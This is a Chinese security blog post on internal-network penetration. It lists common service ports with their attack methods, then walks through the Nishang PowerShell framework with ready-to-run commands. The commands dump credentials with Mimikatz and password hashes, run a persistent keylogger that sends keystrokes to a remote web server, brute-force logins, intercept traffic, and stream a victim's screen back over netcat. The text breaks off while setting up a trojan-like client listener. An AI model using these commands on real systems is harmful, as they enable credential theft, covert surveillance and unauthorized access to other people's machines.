<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="内网渗透, 技术博客, 网络安全, 信息安全, IT, 计算机, 学习">
    <meta name="description" content="技术博客, 网络安全, 信息安全, IT, 计算机, 学习">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>内网渗透 | 剑胆琴心</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">剑胆琴心</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">剑胆琴心</div>
        <div class="logo-desc">
            
            技术博客, 网络安全, 信息安全, IT, 计算机, 学习
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/shuai06" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/shuai06" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/12.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">内网渗透</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    .toc-fixed .toc-link::before{
        position: fixed!important;/*当toc的位置改为fixed时，.toc-link::before也要改为fixed*/
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/内网/">
                                <span class="chip bg-color">内网</span>
                            </a>
                        
                            <a href="/tags/渗透/">
                                <span class="chip bg-color">渗透</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/渗透测试/" class="post-category">
                                渗透测试
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-03-05
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    4.1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    15 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="内网分类："><a href="#内网分类：" class="headerlink" title="内网分类："></a>内网分类：</h1><ul>
<li>带域环境的内网</li>
<li>不带域环境的内网</li>
</ul>
<h1 id="一些端口"><a href="#一些端口" class="headerlink" title="一些端口"></a>一些端口</h1><h3 id="文件共享服务端口渗透"><a href="#文件共享服务端口渗透" class="headerlink" title="文件共享服务端口渗透"></a>文件共享服务端口渗透</h3><blockquote>
<p>比如学校机房有专门用来下载文件的服务器</p>
</blockquote>
<h4 id="ftp服务"><a href="#ftp服务" class="headerlink" title="ftp服务"></a>ftp服务</h4><p><strong>FTP服务：</strong> ftp服务我分为两种情况，第一种是使用系统软件来配置，比如IIS中的FTP文件共享或Linux中的默认服务软件；第二种是通过第三方软件来配置，比如Serv-U还有一些网上写的简易ftp服务器等；<br><strong>默认端口：</strong>20（数据端口）；21（控制端口）；69（tftp小型文件传输协议）</p>
<h6 id="攻击方式："><a href="#攻击方式：" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：ftp的爆破工具有很多：Bruter，以及msf中ftp爆破模块；</li>
<li>匿名访问：用户名：anonymous 密码：为空或任意邮箱</li>
</ul>
<h4 id="Samba服务"><a href="#Samba服务" class="headerlink" title="Samba服务"></a>Samba服务</h4><p><strong>Samba服务：</strong>对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点；samba登录分为两种方式，一种是需要用户名口令；另一种是不需要用户名口令。在很多时候不光是pc机，还有一些服务器，网络设备都开放着此服务，方便进行文件共享，但是同时也给攻击者提供了便利。<br>默认端口：137（主要用户NetBIOS Name Service；NetBIOS名称服务）、139（NetBIOS Session Service，主要提供samba服务）</p>
<h6 id="攻击方式：-1"><a href="#攻击方式：-1" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：弱口令（爆破工具采用hydra）hydra -l username -P</li>
<li>PassFile IP smb</li>
<li>未授权访问：给予public用户高权限</li>
<li>远程代码执行漏洞：CVE-2015-0240、CVE-2017-7494等等</li>
</ul>
<h4 id="LDAP协议"><a href="#LDAP协议" class="headerlink" title="LDAP协议"></a>LDAP协议</h4><p><strong>ldap：</strong>轻量级目录访问协议，最近几年随着ldap的广泛使用被发现的漏洞也越来越多。但是毕竟主流的攻击方式仍旧是那些，比如注入，未授权等等；这些问题的出现也都是因为配置不当而造成的。<br>默认端口：389</p>
<h6 id="攻击方式：-2"><a href="#攻击方式：-2" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>注入攻击盲注 </li>
<li>未授权访问</li>
<li>爆破：弱口令</li>
</ul>
<h3 id="远程连接服务端口渗透"><a href="#远程连接服务端口渗透" class="headerlink" title="远程连接服务端口渗透"></a>远程连接服务端口渗透</h3><h4 id="SSH服务"><a href="#SSH服务" class="headerlink" title="SSH服务"></a>SSH服务</h4><p><strong>SSH服务：</strong>  这个服务基本会出现在我们的Linux服务器，网络设备，安全设备等设备上，而且很多时候这个服务的配置都是默认的；对于SSH服务我们可能使用爆破攻击方式较多。<br><strong>默认端口：</strong>    22</p>
<h6 id="攻击方式：-3"><a href="#攻击方式：-3" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：</li>
<li>弱口令</li>
<li>漏洞：28退格漏洞、OpenSSL漏洞</li>
</ul>
<h4 id="Telent服务"><a href="#Telent服务" class="headerlink" title="Telent服务"></a>Telent服务</h4><p><strong>Telnet服务：</strong>在SSH服务崛起的今天我们已经很难见到使用telnet的服务器，但是在很多设备上同样还是有这个服务的；比如cisco、华三，深信服等厂商的设备；我就有很多次通过telnet弱口令控制这些设备；<br><strong>默认端口：</strong>  23</p>
<h6 id="攻击方式：-4"><a href="#攻击方式：-4" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：弱口令</li>
<li>嗅探：此种情况一般发生在局域网</li>
</ul>
<h4 id="远程桌面连接"><a href="#远程桌面连接" class="headerlink" title="远程桌面连接"></a>远程桌面连接</h4><p><strong>远程桌面连接：</strong>作为windows上进行远程连接的端口，很多时候我们在得到系统为windows的shell的时候我们总是希望可以登录3389实际操作对方电脑；这个时候我们一般的情况分为两种。一种是内网，需要先将目标机3389端口反弹到外网；另一种就是外网，我们可以直接访问；当然这两种情况我们利用起来可能需要很苛刻的条件，比如找到登录密码等等；<br><strong>默认端口：</strong>  3389</p>
<h6 id="攻击方式：-5"><a href="#攻击方式：-5" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：3389端口爆破工具就有点多了(7kbScan-RDP-Sniper，msf的爆破模块)</li>
<li>Shift粘滞键后门：5次shift后门</li>
<li>3389漏洞攻击：利用ms12-020攻击3389端口，导致服务器关机（msf的模块有检测auxiliary/scanner/rdp/ms_12_…，利用模块auxiliary/dos/windows/rdp/ms12_020_maxchannelids）</li>
</ul>
<h4 id="VNC服务"><a href="#VNC服务" class="headerlink" title="VNC服务"></a>VNC服务</h4><p><strong>VNC服务:</strong>    一款优秀的远控工具，常用语类UNIX系统上，简单功能强大；也<br><strong>默认端口：</strong>5900+桌面ID（5901；5902）</p>
<h6 id="攻击方式：-6"><a href="#攻击方式：-6" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：弱口令</li>
<li>认证口令绕过：</li>
<li>拒绝服务攻击：（CVE-2015-5239）</li>
<li>权限提升：（CVE-2013-6886）</li>
</ul>
<h4 id="第三方软件"><a href="#第三方软件" class="headerlink" title="第三方软件"></a>第三方软件</h4><p>… … </p>
<h3 id="Web应用服务端口渗透"><a href="#Web应用服务端口渗透" class="headerlink" title="Web应用服务端口渗透"></a>Web应用服务端口渗透</h3><h4 id="1-中间件平台渗透"><a href="#1-中间件平台渗透" class="headerlink" title="1.中间件平台渗透"></a>1.中间件平台渗透</h4><pre><code>IIS Apache Nginx Weblogic tomcat Jboos Websphere等
# 可使用vulhub靶场测试 `中间件漏洞集合PDF`， `未授权访问集合PDF`
</code></pre><h4 id="2-WEB应用程序渗透"><a href="#2-WEB应用程序渗透" class="headerlink" title="2.WEB应用程序渗透"></a>2.WEB应用程序渗透</h4><ul>
<li><p>已知CMS </p>
</li>
<li><p>未知CMS </p>
</li>
<li><p>常规漏洞测试</p>
</li>
</ul>
<h3 id="数据库服务端口渗透"><a href="#数据库服务端口渗透" class="headerlink" title="数据库服务端口渗透"></a>数据库服务端口渗透</h3><p>针对所有的    数据库攻击方式都存在SQL注入，这里先提出来在下面就不一一写了免得大家说我占篇幅；当然不同的数据库注入技巧可能不一样，特别是NoSQL与传统的SQL数据库不太一样。但是这不是本文需要介绍的重点，后面有时间会写一篇不同数据库的渗透技巧。</p>
<h4 id="MySQL数据库"><a href="#MySQL数据库" class="headerlink" title="MySQL数据库"></a>MySQL数据库</h4><p><strong>默认端口：</strong> 3306</p>
<h6 id="攻击方式：-7"><a href="#攻击方式：-7" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：弱口令</li>
<li>身份认证漏洞：CVE-2012-2122</li>
<li>拒绝服务攻击：利用sql语句是服务器进行死循环打死服务器</li>
<li>Phpmyadmin万能密码绕过：用户名：‘localhost’@’@” 密码任意</li>
</ul>
<h4 id="MSSQL数据库"><a href="#MSSQL数据库" class="headerlink" title="MSSQL数据库"></a>MSSQL数据库</h4><p><strong>默认端口：</strong>1433（Server 数据库服务）、1434（Monitor 数据库监控）</p>
<h6 id="攻击方式：-8"><a href="#攻击方式：-8" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：弱口令</li>
</ul>
<h4 id="Oracle数据库"><a href="#Oracle数据库" class="headerlink" title="Oracle数据库"></a>Oracle数据库</h4><p><strong>默认端口：</strong>1521（数据库端口）、1158（Oracle EMCTL端口）、8080（Oracle XDB数据库）、210（Oracle XDB FTP服务）</p>
<h6 id="攻击方式：-9"><a href="#攻击方式：-9" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：弱口令</li>
<li>漏洞攻击</li>
</ul>
<h4 id="PostgreSQL数据库"><a href="#PostgreSQL数据库" class="headerlink" title="PostgreSQL数据库"></a>PostgreSQL数据库</h4><p>PostgreSQL是一种特性非常齐全的自由软件的对象–关系型数据库管理系统，可以说是目前世界上最先进，功能最强大的自由数据库管理系统。包括我们kali系统中msf也使用这个数据库；浅谈postgresql数据库攻击技术 大部分关于它的攻击依旧是sql注入，所以注入才是数据库不变的话题。<br><strong>默认端口：</strong> 5432</p>
<h6 id="攻击方式：-10"><a href="#攻击方式：-10" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破弱口令：postgres postgres</li>
<li>缓冲区溢出：CVE-2014-2669</li>
</ul>
<h4 id="MongoDB数据库"><a href="#MongoDB数据库" class="headerlink" title="MongoDB数据库"></a>MongoDB数据库</h4><p>MongoDB：NoSQL数据库；攻击方法与其他数据库类似；关于它的安全讲解：请参考<br><strong>默认端口：</strong>  27017</p>
<h6 id="攻击方式：-11"><a href="#攻击方式：-11" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li><p>爆破弱口令 </p>
</li>
<li><p>未授权访问</p>
</li>
</ul>
<h4 id="Redis数据库"><a href="#Redis数据库" class="headerlink" title="Redis数据库"></a>Redis数据库</h4><p>redis：是一个开源的使用c语言写的，支持网络、可基于内存亦可持久化的日志型、key-value数据库。关于这个数据库这两年还是很火的，暴露出来的问题也很多。特别是前段时间暴露的未授权访问。</p>
<p>Exp：<a href="https://yunpan.cn/cYjzHxawFpyVt" target="_blank" rel="noopener">https://yunpan.cn/cYjzHxawFpyVt</a> 访问密码 e547<br><strong>默认端口：</strong>  6379</p>
<h6 id="攻击方式：-12"><a href="#攻击方式：-12" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li><p>爆破弱口令 </p>
</li>
<li><p>未授权访问+配合ssh key提权</p>
</li>
</ul>
<h4 id="SysBase数据库"><a href="#SysBase数据库" class="headerlink" title="SysBase数据库"></a>SysBase数据库</h4><p><strong>默认端口：</strong>服务端口5000；监听端口4100；备份端口：4200</p>
<h6 id="攻击方式：-13"><a href="#攻击方式：-13" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>爆破：</li>
<li>弱口令;</li>
<li>命令注入</li>
</ul>
<h4 id="DB2数据库"><a href="#DB2数据库" class="headerlink" title="DB2数据库"></a>DB2数据库</h4><p><strong>默认端口：</strong>5000</p>
<h6 id="攻击方式：-14"><a href="#攻击方式：-14" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>安全限制绕过：成功后可执行未授权操作（CVE-2015-1922）</li>
</ul>
<p><strong>总结一下：</strong>对于数据库，我们得知端口很多时候可以帮助我们去渗透，比如得知mysql的 数据库，我们就可以使用SQL注入进行mof、udf等方式提权；如果是mssql我们就可以使用xp_cmdshell来进行提权；如果是其它的数据 库，我们也可以采用对应的方式；比如各大数据库对应它们的默认口令，版本对应的漏洞！</p>
<h3 id="邮件服务端口渗透"><a href="#邮件服务端口渗透" class="headerlink" title="邮件服务端口渗透"></a>邮件服务端口渗透</h3><h4 id="SMTP协议"><a href="#SMTP协议" class="headerlink" title="SMTP协议"></a>SMTP协议</h4><p>smtp：邮件协议，在linux中默认开启这个服务，可以向对方发送钓鱼邮件！<br><strong>默认端口：</strong>  25（smtp）、465（smtps）</p>
<h6 id="攻击方式：-15"><a href="#攻击方式：-15" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li><p>爆破：弱口令</p>
</li>
<li><p>未授权访问</p>
</li>
</ul>
<h4 id="POP3协议"><a href="#POP3协议" class="headerlink" title="POP3协议"></a>POP3协议</h4><p><strong>默认端口：</strong> 109（POP2）、110（POP3）、995（POP3S）</p>
<h6 id="攻击方式：-16"><a href="#攻击方式：-16" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li><p>爆破弱口令</p>
</li>
<li><p>未授权访问</p>
</li>
</ul>
<h4 id="IMAP协议"><a href="#IMAP协议" class="headerlink" title="IMAP协议"></a>IMAP协议</h4><p><strong>默认端口：</strong>143（imap）、993（imaps）</p>
<h6 id="攻击方式：-17"><a href="#攻击方式：-17" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li><p>爆破：弱口令</p>
</li>
<li><p>配置不当</p>
</li>
</ul>
<h3 id="网络常见协议端口渗透"><a href="#网络常见协议端口渗透" class="headerlink" title="网络常见协议端口渗透"></a>网络常见协议端口渗透</h3><h4 id="DNS服务"><a href="#DNS服务" class="headerlink" title="DNS服务"></a>DNS服务</h4><p><strong>默认端口：</strong> 53</p>
<h6 id="攻击方式：-18"><a href="#攻击方式：-18" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>区域传输漏洞</li>
</ul>
<h4 id="DHCP服务"><a href="#DHCP服务" class="headerlink" title="DHCP服务"></a>DHCP服务</h4><p><strong>默认端口：</strong>67&amp;68、546（DHCP Failover做双机热备的）</p>
<h6 id="攻击方式：-19"><a href="#攻击方式：-19" class="headerlink" title="攻击方式："></a>攻击方式：</h6><ul>
<li>DHCP劫持</li>
</ul>
<h4 id="SNMP协议"><a href="#SNMP协议" class="headerlink" title="SNMP协议"></a>SNMP协议</h4><p><strong>默认端口：</strong> 161<br>攻击方式:</p>
<ul>
<li>爆破弱口令</li>
</ul>
<hr>
<h1 id="Powershell框架"><a href="#Powershell框架" class="headerlink" title="Powershell框架"></a>Powershell框架</h1><blockquote>
<p>推荐使用 NiShang</p>
</blockquote>
<blockquote>
<p>参考文章：<a href="https://www.4hou.com/posts/E99ml" target="_blank" rel="noopener">https://www.4hou.com/posts/E99ml</a></p>
</blockquote>
<blockquote>
<p>下载地址: <a href="https://github.com/samratashok/nishang" target="_blank" rel="noopener">https://github.com/samratashok/nishang</a></p>
</blockquote>
<blockquote>
<p>各种命令解析： <a href="https://www.explainshell.com" target="_blank" rel="noopener">https://www.explainshell.com</a></p>
</blockquote>
<h4 id="安装问题"><a href="#安装问题" class="headerlink" title="安装问题"></a>安装问题</h4><p>nishang的使用是要在PowerShell3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的（win7下自带的环境是PowerShell 2.0， 自行升级）</p>
<ul>
<li>powershell ISE是一个编译器</li>
<li>powershell有很多渗透框架：</li>
<li>PowerSploit(最多，但是没维护了)、Empire、NiShang(一直更新，推荐), 学一种就行，大同小异</li>
</ul>
<blockquote>
<p>实际渗透中，肯定不能把Nishang整个目录都读到目标服务器上，所以在下载某一个脚本的时候，了解目录结构很重要</p>
</blockquote>
<h4 id="目录结构："><a href="#目录结构：" class="headerlink" title="目录结构："></a>目录结构：</h4><p><img src="http://image.xpshuai.cn/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E7%9B%AE%E5%BD%95.png"></p>
<h4 id="模块和功能介绍："><a href="#模块和功能介绍：" class="headerlink" title="模块和功能介绍："></a>模块和功能介绍：</h4><p><img src="http://image.xpshuai.cn/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E5%8A%9F%E8%83%BD.png"></p>
<h4 id="演示："><a href="#演示：" class="headerlink" title="演示："></a>演示：</h4><p>端口扫描 密码获取 键盘记录 反弹会话 口令爆破</p>
<h4 id="实战应用："><a href="#实战应用：" class="headerlink" title="实战应用："></a>实战应用：</h4><ul>
<li>后续控制</li>
<li>域渗透</li>
<li>系统提权</li>
</ul>
<pre class="line-numbers language-pythn"><code class="language-pythn"># 使用，导入框架（如果出错，重新以管理员运行:执行`Set-ExecutionPolicy remotesigned`）

Import-Module .nishang.psml

# 载入模块  查看NiShang都有哪些模块

Get-Command -Moudle nishang

## 查看机器基本信息

Get-Information

# 把结果导出文件  Out-File

Get-Information | Out-File res.txt


# 检测是否为虚拟机

Check-VM


## 获取密码

Invoke-Minikatz
#Dump出本机的凭证信息
Invoke-Minikatz -DumpCerts
#dump出远程的两台计算机的凭证信息
Invoke-Minikatz -ComputerName @("computer1", "computer2")
#在远程的一台机器上运行Mimikatz 并执行 "privilege::debug exit"
Invoke-Minikatz -Command "privilege::debug exit" -ComputerName@("computer1")


# Get-PassHashes 获取密码

# 在administrator的权限下可以dump出密码hash值（在在msf中的power dump模块进行了修改，不需要system权限就可以dump）

Get-PassHashes


# 获取用户的密码提示信息(需要有administrator的权限) 可以根据提示信息生成密码字典，提高爆破成功率

Get-PassHints



## 获取帮助参数  Get-Help

Get-Help Invoke-PortScan


## 端口扫描

查看帮助信息
Get-Help Invoke-PortScan -full
Invoke-PortScan
Invoke-PortScan -StartAddress 192.168.0.100 -EndAddress 192.168.0.155 -ResolveHost 



# cd 切换到对应目录

## 测试键盘记录:  

Get-Help .\Keylogger.ps1 --full   # 查看帮助（提供了四种方式记录）
#-URL 要把记录发Keylogger送到的置顶的远程服务器    ,    -CheckURL 会检查所给出的网页中是够包含“MagicString”， 如果有就停止记录
.\gather\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php 

# 解释： 将记录指定发送给一个可以记录Post请求的Web服务器

# 默认保存到(内容是ascii码)： Windows/Temp/key.log

# 把ascii记录解析为非ascii：

Parse_Keys .\key.log .\parsed.txt

# 持久化记录（重启之后也记录）

.\Keylogger.ps1 -persist



## 爆破口令  在scan目录下面

#用于对SQL Server、域控制器、Web和FTP弱口令爆破
Invoke-BruteForce
#命令参数如下
-ComputerName    # 对应服务的计算机名
-UserList  用户名字典
-PasswordList  密码字典
-Service 服务（默认为：SQL）
-StopOnSuccess   匹配一个后停止
-Delay    延迟时间
#比如
Invoke-BruteForce -ComputerName  xx-PC  -UserList user.txt  -PasswordList pass.txt  -Service ActiveDirectory  -Verbose


# 内网扫描器

# 用于对内网进行扫描，打开本地监听，然后远程传送数据，把把发送给FireListener

#1.在本机开启监听
FireListener 130-150
#2.在目标机器输入命令：
FireListener 192.168.0.107 130-150 -Verbose


## 内网嗅探

动静很大，实在没有办法的时候可以试试
目标机执行以下命令
Invoke-Interceptor -ProxyServer 192.168.250.172 -ProxyPort 9999
本机监听
nc -lvvp 9999



## 屏幕窃取   Show-TargetScreen

#本机可以使用nc获取powercat进行监听（在本地使用支持MJPEG的浏览器比如firefox，访问本机对应监听端口，即可在浏览器上看到从远端传输回来的实时画面，正向反向均可）
Show-TargetScreen -Reverse -IPAddress 192.168.230.1 -Port 443   # 将远程的画面传输给 192.168.230.1 的443端口
参数： Bind --> 正向连接

在目标机执行以下命令（反向连接）
Show-TargetScreen  -IPAddress 192.168.230.172 -Port 3333
本机输入以下命令 ，接着访问本机的9999端口
nc -nlvp 3333 | nc -nlvp 9999


正向连接
目标机执行：
Show-TargetScreen -Bind -Port 3333
本机执行：
nc -nv 192.168.230.37 3333 | nc -lnvp 9999





## Client 的生成(类似木马)

需要自己绑定payload
首先在本机监听：
nc -lvp 4444
